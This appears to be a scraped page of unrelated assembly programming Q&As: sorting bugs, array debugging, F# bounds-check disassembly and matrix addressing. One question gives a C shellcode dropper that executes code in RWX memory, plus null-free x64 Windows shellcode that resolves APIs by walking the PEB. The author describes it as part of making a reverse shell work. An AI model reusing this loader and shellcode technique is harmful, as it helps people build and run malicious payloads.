I am implementing a function for a bubblesort algorithm in assembly language (Linux, 64-bit, yasm). The function is called from within a C file where the array and the array size are passed through to assembly via rdi and rsi respectively.
xor rax, rax
xor rbx, rbx
xor r14, r14 ; r14 : int j = 0
xor r15, r15 ; r15 : boolean swapped
inc r15 ; swapped = true (=> swapped = 1)
while:
cmp r15, 1 ; while (swapped) (=> check if swapped == 1)
jne end_while
dec r15 ; swapped = false (=> swapped = 0)
inc r14 ; j++
mov rdx, rsi ; rdx = size
sub rdx, r14 ; size - j
xor rcx, rcx ; int i = 0
for:
cmp rcx, rdx ; i < size - j
je end_for
mov rax, [rdi+rcx*4+4] ; rax = rdi+rcx*4+4 => arr[i+1]
mov rbx, [rdi+rcx*4] ; rbx = rdi+rcx*4 => temp = arr[i]
cmp rbx, rax ; if(arr[i] > arr[i+1])
jng done_if
mov [rdi+rcx*4], rax ; arr[i] = arr[i+1]
mov [rdi+rcx*4+4], rbx ; arr[i+1] = temp
inc r15 ; swapped = true (=> swapped = 1)
done_if:
inc rcx ; ++i
jmp for
end_for:
end_while:
ret
The array sorts integers only. I coded the bubblesort in Java and tested it there - it works fine. However, when I pass the array {9,8,7,6,5,4,3,2,1,0} via the C file the output is {8,8,8,8,8,8,8,8,8,9}. I debugged with gdb but still can't see where the issue is. The for-loop construction works fine (rcx and rdx function correctly). It seems that there might be an issue with the way the array elements are accessed.
Any advice would be appreciated.
Your problem is that you are using quadwords (64-bit integers) everywhere but your array is full of doublewords (32-bit integers). In particular, the part where you used mov rax, [rdi+rcx*4+4] should be changed to movl eax, [rdi+rcx*4+4], and the other mov instructions should similarly be changed to movl.
Related
I am able to take a reverse shell program in assembly, compile it using ld or link (visual studio), use objdump, get the shellcode, (yes it has no null-bytes), and I am able to use this in a dropper, a simple call to it works fine such as
#include <stdio.h
#include <windows.h>
int main() {
char *shellcode = "myshellcodegoesinhere";
printf("shellcode length: %i", strlen(shellcode));
void * lpAlloc = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpAlloc, shellcode, strlen(shellcode));
((void(*)())lpAlloc)();
return 0;
}
However, when it comes to 64-bits, I am able to execute my programs as an exe successfully but not in a dropper like above. I literally wrote a 64-bit reverse shell in windows and it works perfectly (havent found another one online that actually works) but when I convert it to shellcode, it doesn't work in my above dropper. And yes I removed all the null bytes from it, it was quite a challenge. So then I decided to see if another simple program would behave the same way and sure enough it does. I took a simple swap mouse button program and rewrote it to remove the null bytes out of it, runs perfectly from an exe but not in a dropper. I know that my 32-bit reverse shell works in a 64-bit system. That is not the point here. The point is any 64-bit application is not able to be used as shellcode on a 64-bit machine. Here is the swap mouse button program in assembly.
BITS 64
SECTION .text
global _start
_start:
sub RSP, 0x28 ; 40 bytes of shadow space
and RSP, 0FFFFFFFFFFFFFFF0h ; Align the stack to a multiple of 16 bytes
; Parse PEB and find kernel32
xor rcx, rcx ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rsi, [rax + 0x20] ; RSI = PEB->Ldr.InMemOrder
lodsq ; RAX = Second module
xchg rax, rsi ; RAX = RSI, RSI = RAX
lodsq ; RAX = Third(kernel32)
mov rbx, [rax + 0x20] ; RBX = Base address
; Parse kernel32 PE
xor r8, r8 ; Clear r8
mov r8d, [rbx + 0x3c] ; R8D = DOS->e_lfanew offset
mov rdx, r8 ; RDX = DOS->e_lfanew
add rdx, rbx ; RDX = PE Header
; start a loop to inc edx 0x88 times to reach the export directory
xor rcx, rcx
xor rax, rax
mov al, 0x88 ; 136 bytes is needed to add to edx to reach the export directory
inc_edx:
inc byte edx
dec al
cmp al, cl
jne inc_edx
mov r8d, [edx] ; R8D = Offset export table
add r8, rbx ; R8 = Export table
xor rsi, rsi ; Clear RSI
mov esi, [r8 + 0x20] ; RSI = Offset namestable
add rsi, rbx ; RSI = Names table
xor rcx, rcx ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA
; Loop through exported functions and find GetProcAddress
Get_Function:
inc rcx ; Increment the ordinal
xor rax, rax ; RAX = 0
mov eax, [rsi + rcx * 4] ; Get name offset
add rax, rbx ; Get function name
cmp QWORD [rax], r9 ; GetProcA ?
jnz Get_Function
xor rsi, rsi ; RSI = 0
mov esi, [r8 + 0x24] ; ESI = Offset ordinals
add rsi, rbx ; RSI = Ordinals table
mov cx, [rsi + rcx * 2] ; Number of function
xor rsi, rsi ; RSI = 0
mov esi, [r8 + 0x1c] ; Offset address table
add rsi, rbx ; ESI = Address table
xor rdx, rdx ; RDX = 0
mov edx, [rsi + rcx * 4] ; EDX = Pointer(offset)
add rdx, rbx ; RDX = GetProcAddress
mov rdi, rdx ; Save GetProcAddress in RDI
; Use GetProcAddress to find the address of LoadLibrary
mov rcx, 0x41797261 ; aryA
push rcx ; Push on the stack
mov rcx, 0x7262694c64616f4c ; LoadLibr
push rcx ; Push on stack
mov rdx, rsp ; LoadLibraryA
mov rcx, rbx ; kernel32.dll base address
sub rsp, 0x20 ; Allocate stack space for function call
call rdi ; Call GetProcAddress
mov rsi, rax ; LoadLibrary saved in RSI
xor rcx, rcx
push dword 0x41416c6c ; ll
;push dword rcx ; Push on the stack
sub word [rsp + 0x2], 0x4141
mov rcx, 0x642e323372657375 ; user32.d
push rcx ; Push on stack
mov rcx, rsp ; user32.dll
sub rsp, 0x20 ; Allocate stack space for function call
call rsi ; Call LoadLibraryA
mov r15, rax ; Base address of user32.dll in R15
; Call GetProcAddress(user32.dll, "SwapMouseButton")
mov rcx, 0x416e6f7474754265 ; eButton
push rcx ; Push on the stack
sub byte [rsp + 0x7], 0x41
mov rcx, 0x73756f4d70617753 ; SwapMous
push rcx ; Push on stack
mov rdx, rsp ; SwapMouseButton
mov rcx, r15 ; User32.dll base address
sub rsp, 0x20 ; Allocate stack space for function call
call rdi ; Call GetProcAddress
mov r15, rax ; SwapMouseButton in R15
; Call SwapMouseButton(true)
xor rcx, rcx ; true
inc cl
call r15 ; SwapMouseButton(true)
; Call GetProcAddress(kernel32.dll, "ExitProcess")
xor rcx, rcx ; RCX = 0
push dword 0x41737365 ; ess
sub byte [rsp + 0x3], 0x41
push rcx ; Push on the stack
mov rcx, 0x636f725074697845 ; ExitProc
push rcx ; Push on stack
mov rdx, rsp ; ExitProcess
mov rcx, rbx ; Kernel32.dll base address
sub rsp, 0x20 ; Allocate stack space for function call
call rdi ; Call GetProcAddress
; Call ExitProcess(0)
xor rcx, rcx ; Exit code 0
call rax ; ExitProcess(0)
Save this as sw64.s
link.exe (visual studio x64 native tools command prompt)
I have two linkers I use that work just fine. both link and Golink.exe
nasm -f win64 sw64.s && link sw64.obj /SUBSYSTEM:CONSOLE /OUT:sw64.exe /LARGEADDRESSAWARE:NO /ENTRY:_start && sw64.exe
or using Golink.exe
nasm -f win64 sw64.s && c:\Golink\GoLink.exe /console /entry _start sw64.obj /fo sw64.exe && sw64.exe
I then convert the shellcode using objdump and filter with awk and sed to produce \x??\x?? output and use this in my dropper. I've done it for my 32-bit reverse shell and it works like a charm but not for 64-bit. I would like to understand why this isn't working. Thank you.
converting 64-bit to shellcode does not work, but 32-bit does
I defined a DWORD variable: arr DWORD 6 Dup(?) and tried to view this array with visual studio debugger.
I did try arr, 6 but it doesn't seem to work while debugging assembly code.
I also tried arr, arr + 1, arr + 2 separately but the result is terribly wrong.
How to view the entire array?
ReadDec_inline proc Uses eax ebx ecx esi edi, n:DWORD, pArr:DWORD
Local OldEsp:DWORD
; Type in n numbers
mov eax,10
mov ebx,n
mul ebx
add eax,n
sub eax,1; add (n-1) space characters
mov OldEsp,esp
sub esp,eax
mov esi,esp
invoke ReadString,esi,45,offset _dword
;Now we extract
mov esi,pArr
mov ecx,n
L1:
mov eax,0
W1:
.If(BYTE PTR[esp + eax] == " " || BYTE PTR[esp + eax] == 0)
mov BYTE PTR[esp+eax],0
jmp quitW1
.Else
inc eax
.EndIf
jmp W1
quitW1:
mov edi,esp
mov ebx,eax
invoke ReadDec, edi, 1
mov [esi],eax ; Fetch the number
add esi,4
add esp,ebx
inc esp ; Next number
loop L1
mov esp,OldEsp
ret
ReadDec_inline endp
proc Uses eax ebx ecx esi edi
Because of the mul ebx instruction, you should add EDX to the list. The result of this multiplication will be in EDX:EAX.
Or better, change
mov eax,10
mov ebx,n
mul ebx
add eax,n
sub eax,1; add (n-1) space characters
into
imul eax, n, 10 + 1
dec eax
invoke ReadString,esi,45,offset _dword
Shouldn't this hardcoded 45 be actually 65? Same as the calculated value?
Your L1 loop depends on the ECX register. I don't think that ECX is a call-preserved register, so probably invoke ReadDec, edi, 1 messes up the count.
mov esi, pArr
mov ecx, n
L1:
mov edi, esp
push ecx ; (1)
xor ebx, ebx
W1:
.If(BYTE PTR[edi + ebx] == " " || BYTE PTR[edi + ebx] == 0)
mov BYTE PTR[edi + ebx], 0
jmp quitW1
.Else
inc ebx
.EndIf
jmp W1
quitW1:
invoke ReadDec, edi, 1
mov [esi], eax ; Fetch the number
add esi, 4
pop ecx ; (1)
add esp, ebx
inc esp ; Next number
dec ecx
jnz L1
I defined a DWORD variable: arr DWORD 6 Dup(?) and tried to view this array with visual studio debugger.
Your invoke ReadDec_inline, 3, offset arr asks for just 3 array elements and you can see their values in the Memory 1 pane. I sincerely thought the issue here was not having specified the whole 6.
However, it fails in the Watch 1 pane because Visual Studio allows you to write expressions in the Watch windows. This means that arr, arr+1, arr+2, and arr+4 are expressions that first retrieve the value at arr (the first array element which has the value 13), and then have some constant added.
I don't use Visual Studio myself, but for MASM you could try:
arr[0] or just arr
arr[4]
arr[8]
or
[arr+0] or just arr
[arr+4]
[arr+8]
I am interested in trying F# in a high-performance application. I do not want to have a large array's bounds checked during iteration and the lack of break/return statements is concerning.
This is a contrived example that will break upon finding a value, but can someone tell me if bounds checking is also elided?
let innerExists (item: Char) (items: Char array): bool =
let mutable state = false
let mutable i = 0
while not state && i < items.Length do
state <- item = items.[i]
i <- i + 1
state
let exists (input: Char array)(illegalChars: Char array): bool =
let mutable state = false
let mutable i = 0
while not state && i < input.Length do
state <- innerExists input.[i] illegalChars
i <- i + 1
state
exists [|'A'..'z'|] [|'.';',';';'|]
Here is the relevant disassembly:
while not state && i < input.Length do
000007FE6EB4237A cmp dword ptr [rbp-14h],0
000007FE6EB4237E jne 000007FE6EB42383
000007FE6EB42380 nop
000007FE6EB42381 jmp 000007FE6EB42386
000007FE6EB42383 nop
000007FE6EB42384 jmp 000007FE6EB423A9
000007FE6EB42386 nop
000007FE6EB42387 mov r8d,dword ptr [rbp-18h]
000007FE6EB4238B mov rdx,qword ptr [rbp+18h]
000007FE6EB4238F cmp r8d,dword ptr [rdx+8]
000007FE6EB42393 setl r8b
000007FE6EB42397 movzx r8d,r8b
000007FE6EB4239B mov dword ptr [rbp-24h],r8d
000007FE6EB4239F mov r8d,dword ptr [rbp-24h]
000007FE6EB423A3 mov dword ptr [rbp-1Ch],r8d
000007FE6EB423A7 jmp 000007FE6EB423B1
000007FE6EB423A9 nop
000007FE6EB423AA xor r8d,r8d
000007FE6EB423AD mov dword ptr [rbp-1Ch],r8d
000007FE6EB423B1 cmp dword ptr [rbp-1Ch],0
000007FE6EB423B5 je 000007FE6EB42409
state <- innerExists input.[i] illegalChars
000007FE6EB423B7 mov r8d,dword ptr [rbp-18h]
000007FE6EB423BB mov rdx,qword ptr [rbp+18h]
000007FE6EB423BF cmp r8,qword ptr [rdx+8]
000007FE6EB423C3 jb 000007FE6EB423CA
000007FE6EB423C5 call 000007FECD796850
000007FE6EB423CA lea rdx,[rdx+r8*2+10h]
000007FE6EB423CF movzx r8d,word ptr [rdx]
000007FE6EB423D3 mov rdx,qword ptr [rbp+10h]
000007FE6EB423D7 mov rdx,qword ptr [rdx+8]
000007FE6EB423DB mov r9,qword ptr [rbp+20h]
000007FE6EB423DF mov rcx,7FE6EEE0640h
000007FE6EB423E9 call 000007FE6EB41E40
000007FE6EB423EE mov dword ptr [rbp-20h],eax
000007FE6EB423F1 mov eax,dword ptr [rbp-20h]
000007FE6EB423F4 movzx eax,al
000007FE6EB423F7 mov dword ptr [rbp-14h],eax
i <- i + 1
000007FE6EB423FA mov eax,dword ptr [rbp-18h]
Others pointed out to use existing function FSharp.Core to achieve the same result but I think that OP asks if in loops like the boundary check of arrays are elided (as it is checked in the loop condition).
For simple code like above the jitter should be able to elide the checks. To see this it is correct to check the assembly code but it is important to not run with the VS debugger attached as the jitter don't optimize the code then. The reason that it can be impossible to show correct values in the debugger.
First let's look at exists optimized x64:
; not state?
00007ff9`1cd37551 85c0 test eax,eax
; if state is true then exit the loop
00007ff9`1cd37553 7521 jne 00007ff9`1cd37576
; i < input.Length?
00007ff9`1cd37555 395e08 cmp dword ptr [rsi+8],ebx
; Seems overly complex but perhaps this is as good as it gets?
00007ff9`1cd37558 0f9fc1 setg cl
00007ff9`1cd3755b 0fb6c9 movzx ecx,cl
00007ff9`1cd3755e 85c9 test ecx,ecx
; if we have reached end of the array then exit
00007ff9`1cd37560 7414 je 00007ff9`1cd37576
; mov i in ebx to rcx, unnecessary but moves like these are very cheap
00007ff9`1cd37562 4863cb movsxd rcx,ebx
; input.[i] (note we don't check the boundary again)
00007ff9`1cd37565 0fb74c4e10 movzx ecx,word ptr [rsi+rcx*2+10h]
; move illegalChars pointer to rdx
00007ff9`1cd3756a 488bd7 mov rdx,rdi
; call innerExists
00007ff9`1cd3756d e8ee9affff call 00007ff9`1cd31060
; i <- i + 1
00007ff9`1cd37572 ffc3 inc ebx
; Jump top of loop
00007ff9`1cd37574 ebdb jmp 00007ff9`1cd37551
; We are done!
00007ff9`1cd37576
So the code looks a bit too complex for what it should need to be but it seems it only checks the array condition once.
Now let's look at innerExists optimized x64:
# let mutable state = false
00007ff9`1cd375a0 33c0 xor eax,eax
# let mutable i = 0
00007ff9`1cd375a2 4533c0 xor r8d,r8d
; not state?
00007ff9`1cd375a5 85c0 test eax,eax
; if state is true then exit the loop
00007ff9`1cd375a7 752b jne 00007ff9`1cd375d4
; i < items.Length
00007ff9`1cd375a9 44394208 cmp dword ptr [rdx+8],r8d
; Seems overly complex but perhaps this is as good as it gets?
00007ff9`1cd375ad 410f9fc1 setg r9b
00007ff9`1cd375b1 450fb6c9 movzx r9d,r9b
00007ff9`1cd375b5 4585c9 test r9d,r9d
; if we have reached end of the array then exit
00007ff9`1cd375b8 741a je 00007ff9`1cd375d4
; mov i in r8d to rax, unnecessary but moves like these are very cheap
00007ff9`1cd375ba 4963c0 movsxd rax,r8d
; items.[i] (note we don't check the boundary again)
00007ff9`1cd375bd 0fb7444210 movzx eax,word ptr [rdx+rax*2+10h]
; mov item in cx to r9d, unnecessary but moves like these are very cheap
00007ff9`1cd375c2 440fb7c9 movzx r9d,cx
; item = items.[i]?
00007ff9`1cd375c6 413bc1 cmp eax,r9d
00007ff9`1cd375c9 0f94c0 sete al
; state <- ?
00007ff9`1cd375cc 0fb6c0 movzx eax,al
; i <- i + 1
00007ff9`1cd375cf 41ffc0 inc r8d
; Jump top of loop
00007ff9`1cd375d2 ebd1 jmp 00007ff9`1cd375a5
; We are done!
00007ff9`1cd375d4 c3 ret
So looks overly complex for what it should be but at least it looks like it only checks the array condition once.
So finally, it looks like the jitter eliminates the array boundary checks because it can prove this has already been checked successfully in the loop condition which I believe is what the OP wondered.
The x64 code doesn't look as clean as it could but from my experimentation x64 code that is cleaned up doesn't perform that much better, I suspect the CPU vendors optimize the CPU for the crappy code jitters produce.
An interesting exercise would be to code up an equivalent program in C++ and run it through https://godbolt.org/, choose x86-64 gcc (trunk) (gcc seems to do best right now) and specify the options -O3 -march=native and see the resulting x64 code.
Update
The code rewritten in https://godbolt.org/ to allow us seeing the assembly code generated by a c++ compiler:
template<int N>
bool innerExists(char item, char const (&items)[N]) {
for (auto i = 0; i < N; ++i) {
if (item == items[i]) return true;
}
return false;
}
template<int N1, int N2>
bool exists(char const (&input)[N1], char const (&illegalCharacters)[N2]) {
for (auto i = 0; i < N1; ++i) {
if (innerExists(input[i], illegalCharacters)) return true;
}
return false;
}
char const separators[] = { '.', ',', ';' };
char const str[58] = { };
bool test() {
return exists(str, separators);
}
x86-64 gcc (trunk) with options -O3 -march=native the following code is generated
; Load the string to test into edx
mov edx, OFFSET FLAT:str+1
.L2:
; Have we reached the end?
cmp rdx, OFFSET FLAT:str+58
; If yes, then jump to the end
je .L7
; Load a character
movzx ecx, BYTE PTR [rdx]
; Comparing the 3 separators are encoded in the assembler
; because the compiler detected the array is always the same
mov eax, ecx
and eax, -3
cmp al, 44
sete al
cmp cl, 59
sete cl
; increase outer i
inc rdx
; Did we find a match?
or al, cl
; If no then loop to .L2
je .L2
; We are done!
ret
.L7:
; No match found, clear result
xor eax, eax
; We are done!
ret
Looks pretty good but what I missing in the code above is using AVX to test multiple characters at once.
Bound check are eliminated by the JIT compiler, so it works the same for F# as for C#. You can expect elimination for code as in your example, as well as for
for i = 0 to data.Lenght - 1 do
...
and also for tail recursive functions, which compiles down to loops.
The built in Array.contains and Array.exists (source code) are written so that the JIT compiler can eliminate bounds checks.
What's wrong with the Array.contains and Array.exists functions ?
let exists input illegalChars =
input |> Array.exists (fun c -> illegalChars |> Array.contains c)
I am trying to convert a C function to NASM in 32-bit.
Here is the C function
void shellsort (int *A, int n)
{
int gap, i, j, temp;
for (gap = n/2; gap > 0; gap /=2)
{
for (i= gap; i<n; i++)
{
for (j=i-gap; j>=0 && A[j] > A[j+gap]; j-=gap)
{
temp = A[j];
A[j] = A[j+gap]
A[j+gap] = temp;
}
}
}
}
Here is what I have done so far
%include "asm_io.inc"
SECTION .data
SECTION .bss
SECTION .text
extern printf
global sort
sort:
push ebp ;set up stack frame
mov ebp, esp
sub esp, 0x10 ;assign 16byte space for local variables
firstloop:
mov eax, [ebp+8] ;moves value of n into eax
mov edx, 0 ;prepares for division, remainder init
mov ecx, 2 ;divisor
div ecx ;division, store gap in eax
cmp eax, 0 ;compare if gap with zero
jle firstloopDone ;firstloopDone
firstloopDone:
div ecx
jmp done
secondloop:
mov ecx, eax ;copy value of gap into ecx, i=gap
cmp ecx, [ebp+8] ;compare i with 1st parameter n
jge secondloopDone ;jump to secondloop if greater-equal
inc ecx ;increment i
jmp thirdloop ;jump to thirdloop
secondloopDone:
inc ecx ;increment i
jmp firstloop ;jump to firstloop
thirdloop:
mov edx, ecx ;save i value
sub ecx, eax ;subtract gap from i and store in ecx
cmp ecx, 0 ;compare j with zero
jl thirdloopDone ;if not j>=0, then skip to end of loop
cmp [ebp+12+ecx], [ebp+12+ecx+eax] ;compare A[j] and A[j+gap]
jle thirdloopDone
sub ecx, eax ;subtract gap from j and store in ecx
jmp swap
thirdloopDone:
sub ecx, eax ;j-gap
jmp secondloop ;jump to second loop
swap:
mov edx, [ebp+12+ecx] ;copy A[j] to temp
mov [ebp+12+ecx], [ebp+12+ecx+eax] ;A[j]=A[j+gap]
mov [edp+12+ecx+eax], edx ;A[j+gap]= temp
jmp thirdloop
done:
leave ;destroy stack frame
ret
Needless to say, it doesn't work.
The error message says:
"error: beroset-p-603-invalid effective address"
at line 58 (thirdloop)
cmp [ebp+12+ecx], [ebp+12+ecx+eax]
and at line 71 (swap)
mov edx, [ebp+12+ecx]
I understand that this may be the wrong method. But from the nested loop in C code, I have too many variables to keep so I cant spare any of the registers.
Also, I suspect I may not have a proper understanding of the stack frame, which may show in my code.
Any help, or bug-discovery, would be greatly appreciated. Thanks.
You say you don't have enough registers to play with but you don't even use EBX, ESI, nor EDI. You made provisions for local variables yet you don't use any.
firstloop:
mov eax, [ebp+8] ;moves value of n into eax
mov edx, 0 ;prepares for division, remainder init
mov ecx, 2 ;divisor
div ecx ;division, store gap in eax
The previous code does not need the division. Simplify it with a shift operation. shr eax,1
The next code will always terminate. Use jle done
cmp eax, 0 ;compare if gap with zero
jle firstloopDone ;firstloopDone
firstloopDone:
div ecx
jmp done
Aren't parameters pushed from right to left?
mov ebx, [ebp+8] ;pointer to array A
firstloop:
mov eax, [ebp+12] ;number of elemnets n
You would typically have to code
swap:
mov edx, [ebx+ecx*4] ;TEMP=A[j]
add ecx,eax
xchg edx, [ebx+ecx*4] ;Swap A[j+gap] with TEMP
sub ecx, eax
mov [ebx+ecx*4], edx ;A[j]=TEMP
jmp thirdloop
I would like some help with operation on matrix in assembly language.
My code does Cholesky Decomposition in C and ASM and compare their speed.
I created nested loops already and its working fine, yest i have no idea how to adress properly matrix to access its elements. Matrix is DOUBLE in C and i managed to transer its adress (first element) to assembly.
Cholesky_double proc \
tab_addr:DWORD, \ ; begin adres of matrix
num_elem:DWORD ; element count in row/column (n of Matrix[n][n])
LOCAL i:DWORD, k:DWORD, j:DWORD, skoczek:DWORD
;skoczek is for operation count check (ex.should be 13 for 3x3 matrix)
; push register on stack
push edx
push ecx
push ebx
push esi
push edi
mov k, 0
mov skoczek, 0
for0start:
inc skoczek
mov eax, k
mov i, eax
inc i
;there should be MATRIX[k][k] = sqrt(MATRIX[k][k])
mov eax, num_elem
sub eax, i
cmp eax, 0
je for1end
for1start:
inc skoczek
;MATRIX[i][k]=MATRIX[i][k]/MATRIX[k][k]
for1koniec:
inc i
mov eax, num_elem
sub eax, i
cmp eax, 0
jne for1start
for1END:
mov eax, k
mov j, eax
inc j
mov eax, num_elem
sub eax, j
cmp eax, 0
je for2end
for2start:
inc skoczek
mov eax, j
mov i, eax
for3start:
inc skoczek
;MATRIX[i][j] = MATRIX[i][j]-MATRIX[i][k]*MATRIX[j][k]
for3koniec:
inc i
mov eax, num_elem
sub eax, i
cmp eax, 0
jne for3start
for2koniec:
inc j
mov eax, num_elem
sub eax, j
cmp eax, 0
jne for2start
for2end:
for0koniec:
inc k
mov eax, num_elem
sub eax, k
cmp eax, 0
jne for0start
koniec:
pop edi
pop esi
pop ebx
pop ecx
pop edx
mov eax, skoczek
ret
; return with operation count in eax
Cholesky_double endp
The matrix passed in C with
extern "C" int __stdcall Cholesky_double(double* tab_adr, int num_el);
I use Visual Studio 2010 and solution with project that create ASSEMBLY library and project with code in C++ that can use assembler functions.
I am not asking for filling code for me, just for a little bit help with correct adressing of matrix to properly access its elemets. If you foresee more problems coming here (like Sqrt in asm i would be pleased with some guidance.
You first have to linearize the address:
&matrix[k][i] = matrix + i*sizeof(double) + k*N*sizeof(double);
where N is the row width. (Assuming NxN matrix)
That can be loaded with
fld [%eax] // load to top of stack in FPU (assuming ia-32 system)
mov %rbx,[%rax]; // vs. load 64-bit register
movsd %xmm0, [%rax] // vs. load a double to lower 64-bits of xmm register